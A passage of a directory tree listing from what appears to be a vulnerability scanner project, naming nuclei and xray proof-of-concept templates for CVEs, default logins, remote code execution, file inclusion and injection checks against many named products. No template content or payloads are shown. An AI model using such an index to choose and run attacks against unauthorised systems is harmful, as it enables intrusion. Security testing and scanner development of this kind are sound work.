CVE-2022-27849.yaml │ │ │ ├── CVE-2022-28363.yaml │ │ │ ├── CVE-2022-28365.yaml │ │ │ ├── CVE-2022-29303.yaml │ │ │ ├── CVE-2022-29383.yaml │ │ │ ├── CVE-2022-29455.yaml │ │ │ ├── CVE-2022-29464.yaml │ │ │ ├── CVE-2022-29548.yaml │ │ │ ├── CVE-2022-30489.yaml │ │ │ ├── CVE-2022-30525.yaml │ │ │ ├── CVE-2022-30776.yaml │ │ │ └── CVE-2022-31268.yaml │ ├── default-logins │ │ ├── UCMDB │ │ │ └── ucmdb-default-login.yaml │ │ ├── abb │ │ │ └── cs141-default-login.yaml │ │ ├── activemq │ │ │ └── activemq-default-login.yaml │ │ ├── aem │ │ │ └── aem-default-login.yaml │ │ ├── alibaba │ │ │ └── canal-default-login.yaml │ │ ├── alphaweb │ │ │ └── alphaweb-default-login.yaml │ │ ├── ambari │ │ │ └── ambari-default-login.yaml │ │ ├── apache │ │ │ ├── airflow-default-login.yaml │ │ │ ├── 
apisix-default-login.yaml │ │ │ ├── dolphinscheduler-default-login.yaml │ │ │ ├── dubbo-admin-default-login.yaml │ │ │ ├── kafka-center-default-login.yaml │ │ │ ├── ranger-default-login.yaml │ │ │ └── tomcat-default-login.yaml │ │ ├── apollo │ │ │ └── apollo-default-login.yaml │ │ ├── arl │ │ │ └── arl-default-login.yaml │ │ ├── azkaban │ │ │ └── azkaban-default-login.yaml │ │ ├── chinaunicom │ │ │ └── chinaunicom-default-login.yaml │ │ ├── cobbler │ │ │ ├── cobbler-default-login.yaml │ │ │ └── hue-default-credential.yaml │ │ ├── dell │ │ │ ├── dell-idrac-default-login.yaml │ │ │ ├── dell-idrac9-default-login.yaml │ │ │ └── emcecom-default-login.yaml │ │ ├── digitalrebar │ │ │ └── digitalrebar-default-login.yaml │ │ ├── druid │ │ │ └── druid-default-login.yaml │ │ ├── dvwa │ │ │ └── dvwa-default-login.yaml │ │ ├── emqx │ │ │ └── emqx-default-login.yaml │ │ ├── exacqvision │ │ │ └── exacqvision-default-login.yaml │ │ ├── flir │ │ │ └── flir-default-login.yaml │ │ ├── frps │ │ │ └── frp-default-login.yaml │ │ ├── fuelcms │ │ │ └── fuelcms-default-login.yaml │ │ ├── geoserver │ │ │ └── geoserver-default-login.yaml │ │ ├── gitlab │ │ │ └── gitlab-weak-login.yaml │ │ ├── glpi │ │ │ └── glpi-default-login.yaml │ │ ├── google │ │ │ └── google-earth-dlogin.yaml │ │ ├── gophish │ │ │ └── gophish-default-login.yaml │ │ ├── grafana │ │ │ └── grafana-default-login.yaml │ │ ├── guacamole │ │ │ └── guacamole-default-login.yaml │ │ ├── hongdian │ │ │ └── hongdian-default-login.yaml │ │ ├── hortonworks │ │ │ └── smartsense-default-login.yaml │ │ ├── hp │ │ │ └── hp-switch-default-login.yaml │ │ ├── huawei │ │ │ └── huawei-HG532e-default-router-login.yaml │ │ ├── ibm │ │ │ ├── ibm-mqseries-default-login.yaml │ │ │ └── ibm-storage-default-credential.yaml │ │ ├── idemia │ │ │ └── idemia-biometrics-default-login.yaml │ │ ├── iptime │ │ │ └── iptime-default-login.yaml │ │ ├── jboss │ │ │ └── jmx-default-login.yaml │ │ ├── jenkins │ │ │ └── jenkins-default.yaml │ │ ├── 
jinher-oa-default-login.yaml │ │ ├── jupyterhub │ │ │ └── jupyterhub-default-login.yaml │ │ ├── mantisbt │ │ │ └── mantisbt-default-credential.yaml │ │ ├── minio │ │ │ └── minio-default-login.yaml │ │ ├── mofi │ │ │ └── mofi4500-default-login.yaml │ │ ├── nagios │ │ │ └── nagios-default-login.yaml │ │ ├── netsus │ │ │ └── netsus-default-login.yaml │ │ ├── nexus │ │ │ └── nexus-default-login.yaml │ │ ├── nps │ │ │ └── nps-default-login.yaml │ │ ├── octobercms-default-login.yaml │ │ ├── ofbiz │ │ │ └── ofbiz-default-login.yaml │ │ ├── openemr │ │ │ └── openemr-default-login.yaml │ │ ├── openwrt │ │ │ └── openwrt-default-login.yaml │ │ ├── oracle │ │ │ └── businessintelligence-default-login.yaml │ │ ├── others │ │ │ ├── inspur-clusterengine-default-login.yaml │ │ │ ├── kingsoft-v8-default-login.yaml │ │ │ ├── panabit-ixcache-default-login.yaml │ │ │ ├── secnet-ac-default-login.yaml │ │ │ └── telecom-gateway-default-login.yaml │ │ ├── paloalto │ │ │ └── panos-default-login.yaml │ │ ├── panabit │ │ │ └── panabit-default-login.yaml │ │ ├── pentaho │ │ │ └── pentaho-default-login.yaml │ │ ├── rabbitmq │ │ │ └── rabbitmq-default-login.yaml │ │ ├── rainloop │ │ │ └── rainloop-default-login.yaml │ │ ├── rancher │ │ │ └── rancher-default-login.yaml │ │ ├── ricoh │ │ │ └── ricoh-weak-password.yaml │ │ ├── rockmongo │ │ │ └── rockmongo-default-login.yaml │ │ ├── rseenet │ │ │ └── rseenet-default-login.yaml │ │ ├── samsung │ │ │ └── samsung-wlan-default-login.yaml │ │ ├── seeddms │ │ │ └── seeddms-default-login.yaml │ │ ├── sequoiadb │ │ │ └── sequoiadb-default-login.yaml │ │ ├── showdoc │ │ │ └── showdoc-default-login.yaml │ │ ├── solarwinds │ │ │ └── solarwinds-default-login.yaml │ │ ├── spectracom │ │ │ └── spectracom-default-login.yaml │ │ ├── stackstorm │ │ │ └── stackstorm-default-login.yaml │ │ ├── supermicro │ │ │ └── supermicro-default-login.yaml │ │ ├── szhe │ │ │ └── szhe-default-login.yaml │ │ ├── versa │ │ │ └── versa-default-login.yaml │ │ ├── vidyo │ │ │ └── 
vidyo-default-login.yaml │ │ ├── viewpoint │ │ │ └── trilithic-viewpoint-login.yaml │ │ ├── visionhub │ │ │ └── visionhub-default-login.yaml │ │ ├── weblogic │ │ │ └── weblogic-weak-login.yaml │ │ ├── wifisky │ │ │ └── wifisky-default-login.yaml │ │ ├── wso2 │ │ │ └── wso2-default-login.yaml │ │ ├── xerox │ │ │ └── xerox7-default-login.yaml │ │ ├── xxljob │ │ │ └── xxljob-default-login.yaml │ │ ├── zabbix │ │ │ └── zabbix-default-login.yaml │ │ └── zmanda │ │ │ └── zmanda-default-login.yaml │ └── vulnerabilities │ │ ├── apache │ │ ├── apache-flink-unauth-rce.yaml │ │ ├── apache-ofbiz-log4j-rce.yaml │ │ ├── apache-solr-file-read.yaml │ │ └── apache-solr-log4j-rce.yaml │ │ ├── cisco │ │ └── cucm-username-enumeration.yaml │ │ ├── code42 │ │ └── code42-log4j-rce.yaml │ │ ├── confluence │ │ └── confluence-ssrf-sharelinks.yaml │ │ ├── dedecms │ │ ├── dedecms-carbuyaction-fileinclude.yaml │ │ ├── dedecms-config-xss.yaml │ │ ├── dedecms-membergroup-sqli.yaml │ │ └── dedecms-openredirect.yaml │ │ ├── eyou │ │ └── eyou-email-rce.yaml │ │ ├── fastjson │ │ ├── fastjson-1-2-24-rce.yaml │ │ ├── fastjson-1-2-41-rce.yaml │ │ ├── fastjson-1-2-42-rce.yaml │ │ ├── fastjson-1-2-43-rce.yaml │ │ ├── fastjson-1-2-47-rce.yaml │ │ ├── fastjson-1-2-62-rce.yaml │ │ ├── fastjson-1-2-67-rce.yaml │ │ └── fastjson-1-2-68-rce.yaml │ │ ├── generic │ │ ├── basic-xss-prober.yaml │ │ ├── cache-poisoning.yaml │ │ ├── cors-misconfig.yaml │ │ ├── crlf-injection.yaml │ │ ├── error-based-sql-injection.yaml │ │ ├── generic-blind-xxe.yaml │ │ ├── generic-linux-lfi.yaml │ │ ├── generic-windows-lfi.yaml │ │ ├── host-header-injection.yaml │ │ ├── oob-header-based-interaction.yaml │ │ ├── oob-param-based-interaction.yaml │ │ ├── open-redirect.yaml │ │ ├── request-based-interaction.yaml │ │ ├── top-xss-params.yaml │ │ └── xmlrpc-pingback-ssrf.yaml │ │ ├── gitlab │ │ └── gitlab-rce.yaml │ │ ├── grafana │ │ └── grafana-file-read.yaml │ │ ├── httpbin │ │ ├── httpbin-open-redirect.yaml │ │ └── httpbin-xss.yaml │ │ 
├── huawei │ │ └── huawei-hg255s-lfi.yaml │ │ ├── ibm │ │ ├── eclipse-help-system-xss.yaml │ │ └── ibm-infoprint-lfi.yaml │ │ ├── jamf │ │ ├── jamf-blind-xxe.yaml │ │ └── jamf-log4j-jndi-rce.yaml │ │ ├── jenkins │ │ ├── jenkins-asyncpeople.yaml │ │ ├── jenkins-script.yaml │ │ ├── jenkins-stack-trace.yaml │ │ └── unaunthenticated-jenkin.yaml │ │ ├── jira │ │ ├── jira-service-desk-signup.yaml │ │ ├── jira-unauthenticated-adminprojects.yaml │ │ ├── jira-unauthenticated-dashboards.yaml │ │ ├── jira-unauthenticated-installed-gadgets.yaml │ │ ├── jira-unauthenticated-projectcategories.yaml │ │ ├── jira-unauthenticated-projects.yaml │ │ ├── jira-unauthenticated-resolutions.yaml │ │ ├── jira-unauthenticated-screens.yaml │ │ └── jira-unauthenticated-user-picker.yaml │ │ ├── jolokia │ │ └── jolokia-heap-info-disclosure.yaml │ │ ├── joomla │ │ ├── joomla-jvehicles-lfi.yaml │ │ └── rusty-joomla.yaml │ │ ├── laravel │ │ └── laravel-ignition-xss.yaml │ │ ├── linkerd │ │ └── linkerd-ssrf.yaml │ │ ├── magento │ │ ├── magento-2-exposed-api.yaml │ │ ├── magento-cacheleak.yaml │ │ └── magento-unprotected-dev-files.yaml │ │ ├── metersphere │ │ └── metersphere-plugin-rce.yaml │ │ ├── mobileiron │ │ └── mobileiron-log4j-jndi-rce.yaml │ │ ├── moodle │ │ ├── moodle-filter-jmol-lfi.yaml │ │ ├── moodle-filter-jmol-xss.yaml │ │ └── moodle-xss.yaml │ │ ├── netsweeper │ │ ├── netsweeper-open-redirect.yaml │ │ └── netsweeper-rxss.yaml │ │ ├── oracle │ │ ├── oracle-ebs-bispgraph-file-access.yaml │ │ ├── oracle-ebs-xss.yaml │ │ └── oracle-siebel-xss.yaml │ │ ├── oscommerce │ │ └── oscommerce-rce.yaml │ │ ├── other │ │ ├── 3cx-management-console.yaml │ │ ├── 74cms-sqli.yaml │ │ ├── WSO2-2019-0598.yaml │ │ ├── accent-microcomputers-lfi.yaml │ │ ├── acme-xss.yaml │ │ ├── antsword-backdoor.yaml │ │ ├── asanhamayesh-lfi.yaml │ │ ├── aspnuke-openredirect.yaml │ │ ├── avada-xss.yaml │ │ ├── bems-api-lfi.yaml │ │ ├── beward-ipcamera-disclosure.yaml │ │ ├── bitrix-open-redirect.yaml │ │ ├── 
blue-ocean-excellence-lfi.yaml │ │ ├── bullwark-momentum-lfi.yaml │ │ ├── cacti-weathermap-file-write.yaml │ │ ├── caucho-resin-info-disclosure.yaml │ │ ├── chamilo-lms-sqli.yaml │ │ ├── chamilo-lms-xss.yaml │ │ ├── ckan-dom-based-xss.yaml │ │ ├── clockwatch-enterprise-rce.yaml │ │ ├── coldfusion-debug-xss.yaml │ │ ├── commax-biometric-auth-bypass.yaml │ │ ├── commax-credentials-disclosure.yaml │ │ ├── comtrend-password-exposure.yaml │ │ ├── concrete-xss.yaml │ │ ├── core-chuangtian-cloud-rce.yaml │ │ ├── couchdb-adminparty.yaml │ │ ├── cs-cart-unauthenticated-lfi.yaml │ │ ├── dicoogle-pacs-lfi.yaml │ │ ├── digitalrebar-traversal.yaml │ │ ├── discourse-xss.yaml │ │ ├── dixell-xweb500-filewrite.yaml │ │ ├── dlink-850L-info-leak.yaml │ │ ├── dotnetcms-sqli.yaml │ │ ├── dss-download-fileread.yaml │ │ ├── duomicms-sql-injection.yaml │ │ ├── ecshop-sqli.yaml │ │ ├── ecsimagingpacs-rce.yaml │ │ ├── eibiz-lfi.yaml │ │ ├── empirecms-xss.yaml │ │ ├── etouch-v2-sqli.yaml │ │ ├── ewebs-arbitrary-file-reading.yaml │ │ ├── eyelock-nano-lfd.yaml │ │ ├── fanruanoa2012-disclosure.yaml │ │ ├── fatpipe-auth-bypass.yaml │ │ ├── fatpipe-backdoor.yaml │ │ ├── feifeicms-lfr.yaml │ │ ├── finereport-path-traversal.yaml │ │ ├── flir-path-traversal.yaml │ │ ├── geovision-geowebserver-lfi.yaml │ │ ├── geovision-geowebserver-xss.yaml │ │ ├── global-domains-lfi.yaml │ │ ├── global-domains-xss.yaml │ │ ├── gloo-unauth.yaml │ │ ├── gnuboard-sms-xss.yaml │ │ ├── goip-1-lfi.yaml │ │ ├── groupoffice-lfi.yaml │ │ ├── gsoap-lfi.yaml │ │ ├── h3c-imc-rce.yaml │ │ ├── hanming-lfr.yaml │ │ ├── hashicorp-consul-rce.yaml │ │ ├── hasura-graphql-psql-exec.yaml │ │ ├── hasura-graphql-ssrf.yaml │ │ ├── hiboss-rce.yaml │ │ ├── hjtcloud-arbitrary-file-read.yaml │ │ ├── hjtcloud-rest-arbitrary-file-read.yaml │ │ ├── homeautomation-v3-openredirect.yaml │ │ ├── hrsale-unauthenticated-lfi.yaml │ │ ├── huawei-hg659-lfi.yaml │ │ ├── huawei-router-auth-bypass.yaml │ │ ├── huijietong-cloud-fileread.yaml │ │ ├── 
icewarp-webclient-rce.yaml │ │ ├── interlib-fileread.yaml │ │ ├── java-melody-xss.yaml │ │ ├── jeewms-lfi.yaml │ │ ├── jfrog-unauth-build-exposed.yaml │ │ ├── jinfornet-jreport-lfi.yaml │ │ ├── joomla-com-fabrik-lfi.yaml │ │ ├── kafdrop-xss.yaml │ │ ├── karel-ip-phone-lfi.yaml │ │ ├── kevinlab-bems-backdoor.yaml │ │ ├── kevinlab-bems-sqli.yaml │ │ ├── kevinlab-hems-backdoor.yaml │ │ ├── keycloak-xss.yaml │ │ ├── kingdee-eas-directory-traversal.yaml │ │ ├── kingsoft-v8-file-read.yaml │ │ ├── kyocera-m2035dn-lfi.yaml │ │ ├── laravel-filemanager-lfi.yaml │ │ ├── lotuscms-rce.yaml │ │ ├── lucee-xss.yaml │ │ ├── luftguitar-arbitrary-file-upload.yaml │ │ ├── maccmsv10-backdoor.yaml │ │ ├── magicflow-lfi.yaml │ │ ├── mcafee-epo-rce.yaml │ │ ├── metinfo-lfi.yaml │ │ ├── microstrategy-ssrf.yaml │ │ ├── microweber-xss.yaml │ │ ├── mida-eframework-xss.yaml │ │ ├── minimouse-lfi.yaml │ │ ├── mirai-unknown-rce.yaml │ │ ├── mpsec-lfi.yaml │ │ ├── ms-exchange-server-reflected-xss.yaml │ │ ├── myucms-lfr.yaml │ │ ├── natshell-path-traversal.yaml │ │ ├── natshell-rce.yaml │ │ ├── netgear-router-auth-bypass.yaml │ │ ├── netgear-router-exposure.yaml │ │ ├── netgear-wac124-router-auth-bypass.yaml │ │ ├── netis-info-leak.yaml │ │ ├── nginx-merge-slashes-path-traversal.yaml │ │ ├── nginx-module-vts-xss.yaml │ │ ├── ns-asg-file-read.yaml │ │ ├── nuuo-file-inclusion.yaml │ │ ├── nuuo-nvrmini2-rce.yaml │ │ ├── odoo-cms-redirect.yaml │ │ ├── oliver-library-lfi.yaml │ │ ├── opensis-lfi.yaml │ │ ├── opensns-rce.yaml │ │ ├── openvpn-hhi.yaml │ │ ├── optilink-ont1gew-gpon-rce.yaml │ │ ├── oracle-fatwire-lfi.yaml │ │ ├── orbiteam-bscw-server-lfi.yaml │ │ ├── otobo-open-redirect.yaml │ │ ├── pacsone-server-lfi.yaml │ │ ├── parentlink-xss.yaml │ │ ├── pbootcms-database-file-download.yaml │ │ ├── pdf-signer-ssti-to-rce.yaml │ │ ├── php-timeclock-xss.yaml │ │ ├── php-zerodium-backdoor-rce.yaml │ │ ├── phpok-sqli.yaml │ │ ├── phpwiki-lfi.yaml │ │ ├── pmb-directory-traversal.yaml │ │ ├── 
pmb-local-file-disclosure.yaml │ │ ├── pollbot-redirect.yaml │ │ ├── powercreator-cms-rce.yaml │ │ ├── processmaker-lfi.yaml │ │ ├── pyspider-unauthorized-access.yaml │ │ ├── qcubed-xss.yaml │ │ ├── qi-anxin-netkang-next-generation-firewall-rce.yaml │ │ ├── qihang-media-disclosure.yaml │ │ ├── qihang-media-lfi.yaml │ │ ├── qizhi-fortressaircraft-unauth.yaml │ │ ├── rconfig-rce.yaml │ │ ├── resin-cnnvd-200705-315.yaml │ │ ├── resin-inputfile-fileread.yaml │ │ ├── resin-viewfile-lfr.yaml │ │ ├── rockmongo-xss.yaml │ │ ├── sangfor-ba-rce.yaml │ │ ├── sap-redirect.yaml │ │ ├── sar2html-rce.yaml │ │ ├── seacms-rce.yaml │ │ ├── seacms-sqli.yaml │ │ ├── seowon-router-rce.yaml │ │ ├── servicenow-helpdesk-credential.yaml │ │ ├── showdoc-file-upload-rce.yaml │ │ ├── sick-beard-xss.yaml │ │ ├── sl-studio-lfi.yaml │ │ ├── sofneta-mecdream-pacs-lfi.yaml │ │ ├── solar-log-authbypass.yaml │ │ ├── sonicwall-sslvpn-shellshock.yaml │ │ ├── spark-webui-unauth.yaml │ │ ├── sponip-network-system-ping-rce.yaml │ │ ├── symantec-messaging-gateway.yaml │ │ ├── tamronos-rce.yaml │ │ ├── tekon-info-leak.yaml │ │ ├── thinkific-redirect.yaml │ │ ├── thruk-xss.yaml │ │ ├── tianqing-info-leak.yaml │ │ ├── tikiwiki-json-rpc.yaml │ │ ├── tikiwiki-reflected-xss.yaml │ │ ├── tpshop-directory-traversal.yaml │ │ ├── turbocrm-xss.yaml │ │ ├── twig-php-ssti.yaml │ │ ├── ueditor-file-upload.yaml │ │ ├── unauth-hoteldruid-panel.yaml │ │ ├── unauth-rlm.yaml │ │ ├── unauth-spark-api.yaml │ │ ├── unifi-network-log4j-rce.yaml │ │ ├── vanguard-post-xss.yaml │ │ ├── viewlinc-crlf-injection.yaml │ │ ├── vpms-auth-bypass.yaml │ │ ├── watchguard-credentials-disclosure.yaml │ │ ├── webui-rce.yaml │ │ ├── wems-manager-xss.yaml │ │ ├── wooyun-path-traversal.yaml │ │ ├── wuzhicms-sqli.yaml │ │ ├── xdcms-sqli.yaml │ │ ├── xerox-efi-lfi.yaml │ │ ├── yapi-rce.yaml │ │ ├── yarn-resourcemanager-rce.yaml │ │ ├── yishaadmin-lfi.yaml │ │ ├── yonyou-u8-oa-sqli.yaml │ │ ├── zcms-v3-sqli.yaml │ │ ├── zimbra-preauth-ssrf.yaml │ │ 
└── zms-auth-bypass.yaml │ │ ├── rails │ │ └── rails6-xss.yaml │ │ ├── ransomware │ │ └── deadbolt-ransomware.yaml │ │ ├── rocketchat │ │ └── unauth-message-read.yaml │ │ ├── ruijie │ │ ├── ruijie-eg-rce.yaml │ │ ├── ruijie-networks-lfi.yaml │ │ ├── ruijie-networks-rce.yaml │ │ └── ruijie-password-leak.yaml │ │ ├── samsung │ │ ├── samsung-wlan-ap-lfi.yaml │ │ ├── samsung-wlan-ap-rce.yaml │ │ └── samsung-wlan-ap-xss.yaml │ │ ├── sangfor │ │ ├── sangfor-edr-auth-bypass.yaml │ │ └── sangfor-edr-rce.yaml │ │ ├── seeyon │ │ ├── wooyun-2015-148227.yaml │ │ ├── zhiyuan-file-upload.yaml │ │ ├── zhiyuan-oa-info-leak.yaml │ │ └── zhiyuan-oa-session-leak.yaml │ │ ├── simplecrm │ │ └── simple-crm-sql-injection.yaml │ │ ├── springboot │ │ ├── springboot-actuators-jolokia-xxe.yaml │ │ ├── springboot-h2-db-rce.yaml │ │ └── springboot-log4j-rce.yaml │ │ ├── squirrelmail │ │ ├── squirrelmail-add-xss.yaml │ │ ├── squirrelmail-lfi.yaml │ │ └── squirrelmail-vkeyboard-xss.yaml │ │ ├── thinkcmf │ │ ├── thinkcmf-arbitrary-code-execution.yaml │ │ ├── thinkcmf-lfi.yaml │ │ └── thinkcmf-rce.yaml │ │ ├── thinkphp │ │ ├── thinkphp-2-rce.yaml │ │ ├── thinkphp-501-rce.yaml │ │ ├── thinkphp-5022-rce.yaml │ │ ├── thinkphp-5023-rce.yaml │ │ └── thinkphp-509-information-disclosure.yaml │ │ ├── tongda │ │ ├── tongda-path-traversal.yaml │ │ └── tongda-session-disclosure.yaml │ │ ├── vmware │ │ ├── vmware-horizon-log4j-jndi-rce.yaml │ │ ├── vmware-vcenter-lfi-linux.yaml │ │ ├── vmware-vcenter-lfi.yaml │ │ ├── vmware-vcenter-log4j-jndi-rce.yaml │ │ ├── vmware-vcenter-ssrf.yaml │ │ └── vrealize-operations-log4j-rce.yaml │ │ ├── weaver │ │ ├── ecology │ │ │ ├── ecology-arbitrary-file-upload.yaml │ │ │ ├── ecology-filedownload-directory-traversal.yaml │ │ │ ├── ecology-springframework-directory-traversal.yaml │ │ │ ├── ecology-syncuserinfo-sqli.yaml │ │ │ └── ecology-v8-sqli.yaml │ │ └── oa-v9-uploads-file.yaml │ │ ├── wordpress │ │ ├── accessibility-helper-xss.yaml │ │ ├── ad-widget-lfi.yaml │ │ ├── 
admin-word-count-column-lfi.yaml │ │ ├── advanced-access-manager-lfi.yaml │ │ ├── age-gate-open-redirect.yaml │ │ ├── ait-csv-import-export-rce.yaml │ │ ├── alfacgiapi-wordpress.yaml │ │ ├── amministrazione-aperta-lfi.yaml │ │ ├── aspose-file-download.yaml │ │ ├── aspose-ie-file-download.yaml │ │ ├── aspose-pdf-file-download.yaml │ │ ├── aspose-words-file-download.yaml │ │ ├── attitude-theme-open-redirect.yaml │ │ ├── brandfolder-lfi.yaml │ │ ├── brandfolder-open-redirect.yaml │ │ ├── cab-fare-calculator-lfi.yaml │ │ ├── candidate-application-lfi.yaml │ │ ├── cherry-file-download.yaml │ │ ├── cherry-lfi.yaml │ │ ├── church-admin-lfi.yaml │ │ ├── churchope-lfi.yaml │ │ ├── db-backup-lfi.yaml │ │ ├── diarise-theme-lfi.yaml │ │ ├── dzs-zoomsounds-listing.yaml │ │ ├── easy-media-gallery-pro-listing.yaml │ │ ├── eatery-restaurant-open-redirect.yaml │ │ ├── elex-woocommerce-xss.yaml │ │ ├── feedwordpress-xss.yaml │ │ ├── flow-flow-social-stream-xss.yaml │ │ ├── hb-audio-lfi.yaml │ │ ├── health-check-lfi.yaml │ │ ├── hide-security-enhancer-lfi.yaml │ │ ├── issuu-panel-lfi.yaml │ │ ├── mthemeunus-lfi.yaml │ │ ├── music-store-open-redirect.yaml │ │ ├── my-chatbot-xss.yaml │ │ ├── nativechurch-wp-theme-lfd.yaml │ │ ├── newsletter-manager-open-redirect.yaml │ │ ├── newsletter-open-redirect.yaml │ │ ├── ninjaform-open-redirect.yaml │ │ ├── pieregister-open-redirect.yaml │ │ ├── sassy-social-share.yaml │ │ ├── seo-redirection-xss.yaml │ │ ├── shortcode-lfi.yaml │ │ ├── simple-image-manipulator-lfi.yaml │ │ ├── sniplets-lfi.yaml │ │ ├── sniplets-xss.yaml │ │ ├── ultimatemember-open-redirect.yaml │ │ ├── video-synchro-pdf-lfi.yaml │ │ ├── w3c-total-cache-ssrf.yaml │ │ ├── weekender-newspaper-open-redirect.yaml │ │ ├── wordpress-accessible-wpconfig.yaml │ │ ├── wordpress-affiliatewp-log.yaml │ │ ├── wordpress-bbpress-plugin-listing.yaml │ │ ├── wordpress-db-backup-listing.yaml │ │ ├── wordpress-db-backup.yaml │ │ ├── wordpress-db-repair.yaml │ │ ├── wordpress-debug-log.yaml │ │ 
├── wordpress-directory-listing.yaml │ │ ├── wordpress-elementor-plugin-listing.yaml │ │ ├── wordpress-emergency-script.yaml │ │ ├── wordpress-git-config.yaml │ │ ├── wordpress-gtranslate-plugin-listing.yaml │ │ ├── wordpress-infinitewp-auth-bypass.yaml │ │ ├── wordpress-installer-log.yaml │ │ ├── wordpress-rce-simplefilelist.yaml │ │ ├── wordpress-rdf-user-enum.yaml │ │ ├── wordpress-redirection-plugin-listing.yaml │ │ ├── wordpress-social-metrics-tracker.yaml │ │ ├── wordpress-ssrf-oembed.yaml │ │ ├── wordpress-tmm-db-migrate.yaml │ │ ├── wordpress-total-upkeep-backup-download.yaml │ │ ├── wordpress-updraftplus-pem-key.yaml │ │ ├── wordpress-user-enum.yaml │ │ ├── wordpress-woocommerce-listing.yaml │ │ ├── wordpress-woocommerce-sqli.yaml │ │ ├── wordpress-wordfence-lfi.yaml │ │ ├── wordpress-wordfence-waf-bypass-xss.yaml │ │ ├── wordpress-wordfence-xss.yaml │ │ ├── wordpress-wp-cron.yaml │ │ ├── wordpress-xmlrpc-listmethods.yaml │ │ ├── wordpress-zebra-form-xss.yaml │ │ ├── wp-123contactform-plugin-listing.yaml │ │ ├── wp-adaptive-xss.yaml │ │ ├── wp-altair-listing.yaml │ │ ├── wp-ambience-xss.yaml │ │ ├── wp-arforms-listing.yaml │ │ ├── wp-church-admin-xss.yaml │ │ ├── wp-code-snippets-xss.yaml │ │ ├── wp-config-setup.yaml │ │ ├── wp-custom-tables-xss.yaml │ │ ├── wp-email-subscribers-listing.yaml │ │ ├── wp-enabled-registration.yaml │ │ ├── wp-finder-xss.yaml │ │ ├── wp-flagem-xss.yaml │ │ ├── wp-full-path-disclosure.yaml │ │ ├── wp-grimag-open-redirect.yaml │ │ ├── wp-gtranslate-open-redirect.yaml │ │ ├── wp-haberadam-idor.yaml │ │ ├── wp-idx-broker-platinum-listing.yaml │ │ ├── wp-install.yaml │ │ ├── wp-iwp-client-listing.yaml │ │ ├── wp-javospot-lfi.yaml │ │ ├── wp-knews-xss.yaml │ │ ├── wp-license-file.yaml │ │ ├── wp-mailchimp-log-exposure.yaml │ │ ├── wp-memphis-documents-library-lfi.yaml │ │ ├── wp-mstore-plugin-listing.yaml │ │ ├── wp-multiple-theme-ssrf.yaml │ │ ├── wp-nextgen-xss.yaml │ │ ├── wp-oxygen-theme-lfi.yaml │ │ ├── wp-phpfreechat-xss.yaml │ 
│ ├── wp-plugin-1-flashgallery-listing.yaml │ │ ├── wp-plugin-lifterlms.yaml │ │ ├── wp-plugin-utlimate-member.yaml │ │ ├── wp-popup-listing.yaml │ │ ├── wp-prostore-open-redirect.yaml │ │ ├── wp-qards-listing.yaml │ │ ├── wp-revslider-file-download.yaml │ │ ├── wp-securimage-xss.yaml │ │ ├── wp-security-open-redirect.yaml │ │ ├── wp-sfwd-lms-listing.yaml │ │ ├── wp-simple-fields-lfi.yaml │ │ ├── wp-slideshow-xss.yaml │ │ ├── wp-socialfit-xss.yaml │ │ ├── wp-spot-premium-lfi.yaml │ │ ├── wp-super-forms.yaml │ │ ├── wp-tinymce-lfi.yaml │ │ ├── wp-tutor-lfi.yaml │ │ ├── wp-under-construction-ssrf.yaml │ │ ├── wp-upload-data.yaml │ │ ├── wp-vault-lfi.yaml │ │ ├── wp-whmcs-xss.yaml │ │ ├── wp-woocommerce-email-verification.yaml │ │ ├── wp-woocommerce-file-download.yaml │ │ ├── wp-woocommerce-pdf-invoice-listing.yaml │ │ ├── wp-xmlrpc-brute-force.yaml │ │ ├── wp-xmlrpc-pingback-detection.yaml │ │ ├── wp-xmlrpc.yaml │ │ ├── wpdm-cache-session.yaml │ │ ├── wpmudev-pub-keys.yaml │ │ └── wptouch-open-redirect.yaml │ │ └── yonyou │ │ └── erp-nc-directory-traversal.yaml ├── pkg │ ├── common │ │ └── structs │ │ │ └── commonStructs.go │ ├── nuclei │ │ ├── catalog │ │ │ ├── catalogue.go │ │ │ └── find.go │ │ ├── parse │ │ │ ├── parse.go │ │ │ └── parser.go │ │ ├── structs │ │ │ └── faketype.go │ │ └── templates │ │ │ ├── cluster.go │ │ │ ├── compile.go │ │ │ ├── preprocessors.go │ │ │ ├── templates.go │ │ │ └── workflows.go │ └── xray │ │ ├── cel │ │ ├── cel.go │ │ ├── definition.go │ │ └── implementation.go │ │ ├── requests │ │ ├── cache.go │ │ └── requests.go │ │ └── structs │ │ ├── cache.go │ │ ├── poc.go │ │ ├── requests.pb.go │ │ ├── requests.proto │ │ └── tasks.go ├── utils │ ├── load.go │ └── utils.go ├── xrayFiles │ ├── 74cms-sqli-1.yml │ ├── 74cms-sqli-2.yml │ ├── 74cms-sqli.yml │ ├── activemq-cve-2016-3088.yml │ ├── activemq-default-password.yml │ ├── airflow-unauth.yml │ ├── alibaba-canal-default-password.yml │ ├── alibaba-canal-info-leak.yml │ ├── 
alibaba-nacos-v1-auth-bypass.yml │ ├── amtt-hiboss-server-ping-rce.yml │ ├── apache-ambari-default-password.yml │ ├── apache-druid-cve-2021-36749.yml │ ├── apache-flink-upload-rce.yml │ ├── apache-httpd-cve-2021-40438-ssrf.yml │ ├── apache-httpd-cve-2021-41773-path-traversal.yml │ ├── apache-httpd-cve-2021-41773-rce.yml │ ├── apache-kylin-unauth-cve-2020-13937.yml │ ├── apache-nifi-api-unauthorized-access.yml │ ├── apache-ofbiz-cve-2018-8033-xxe.yml │ ├── apache-ofbiz-cve-2020-9496-xml-deserialization.yml │ ├── apache-storm-unauthorized-access.yml │ ├── aspcms-backend-leak.yml │ ├── bash-cve-2014-6271.yml │ ├── bt742-pma-unauthorized-access.yml │ ├── cacti-weathermap-file-write.yml │ ├── chinaunicom-modem-default-password.yml │ ├── cisco-cve-2020-3452-readfile.yml │ ├── citrix-cve-2019-19781-path-traversal.yml │ ├── citrix-cve-2020-8191-xss.yml │ ├── citrix-cve-2020-8193-unauthorized.yml │ ├── citrix-xenmobile-cve-2020-8209.yml │ ├── coldfusion-cve-2010-2861-lfi.yml │ ├── confluence-cve-2015-8399.yml │ ├── confluence-cve-2019-3396-lfi.yml │ ├── confluence-cve-2021-26084.yml │ ├── confluence-cve-2021-26085-arbitrary-file-read.yml │ ├── consul-rexec-rce.yml │ ├── consul-service-rce.yml │ ├── coremail-cnvd-2019-16798.yml │ ├── couchcms-cve-2018-7662.yml │ ├── couchdb-cve-2017-12635.yml │ ├── couchdb-unauth.yml │ ├── craftcms-seomatic-cve-2020-9757-rce.yml │ ├── dahua-cve-2021-33044-authentication-bypass.yml │ ├── datang-ac-default-password-cnvd-2021-04128.yml │ ├── 